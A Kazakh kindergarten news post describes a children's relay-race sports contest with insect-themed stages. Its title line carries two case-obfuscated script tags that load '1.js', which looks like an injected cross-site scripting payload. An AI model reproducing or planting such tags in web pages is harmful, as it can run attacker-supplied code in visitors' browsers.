Дені сау, мықты ,шымыр болып өсуге спорт көмектеседі.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.05.2021

  Дені сау, мықты ,шымыр  болып өсуге спорт көмектеседі. Дене шынықтырумен айналысу пайдалы, ал дене тәрбиесі одан екі есе көңілдірек болады. Өйткені, спорттың әр минуты адамның өмірін бір сағатқа, ал көңілді спортпен айналысқан  екі сағатқа, тіпті минутымен ұзартады. Сенбейсіз бе? Өзіңізді тексеріп көріңіз!»

   Біздің бөбекжайда бос уақытта,спорт алаңында өткен сайысымыз  «Мықтылар  сайысы» деп аталды. Қатысушылар мектепалды даярлық  «Зерек бала» тобының балалары болды. Күштілік, ептілік, тапқырлық, жылдамдық бойынша жарыста «Күштілер» және «Ептілер» атты екі команда қатысты. Командалар көктемде оянған жәндіктерді салды. Жарыс эстафета түрінде өтті. Алғашқы эстафета ол   «Гүлдер» эстафетасы болды, балалар жапырақшалардан гүл жинады.  Ал екінші «Ара» эстафетасында  балалар қолдарына  шелек алып гүлден бал жинады. Үшінші «Шегіртке» эстафетасында балалар екі аяғымен бағдарға дейін және кері секірді. Төртінші «Құмырсқалар» эстафетасында  балалар қолдарына таяқша алып, бағдарға дейін жүгіріп қолдарындағы  таяқтарды жинап, құмырсқа жасады. Бесінші «Гусеница»  эстафетасында балалар қол ұстасып, бағдарға дейін алға қарай жүгірді. Жарыс қорытындысы бойынша достық жеңді.Барлық қатысушылар үлкен қуаныш және көптеген әсер алды.

Приходько Н.Л ,дене шынықтыру нұсқаушысы 

    Спорттық жарыс балаларға бәсекелестік рухын көтеруге, командада жұмыс істей білуге, қиындықтарды жеңуге көмектесті.

Просмотров: 332


Пікір қосу



Деректерді қолтаңбаға қосу
Текст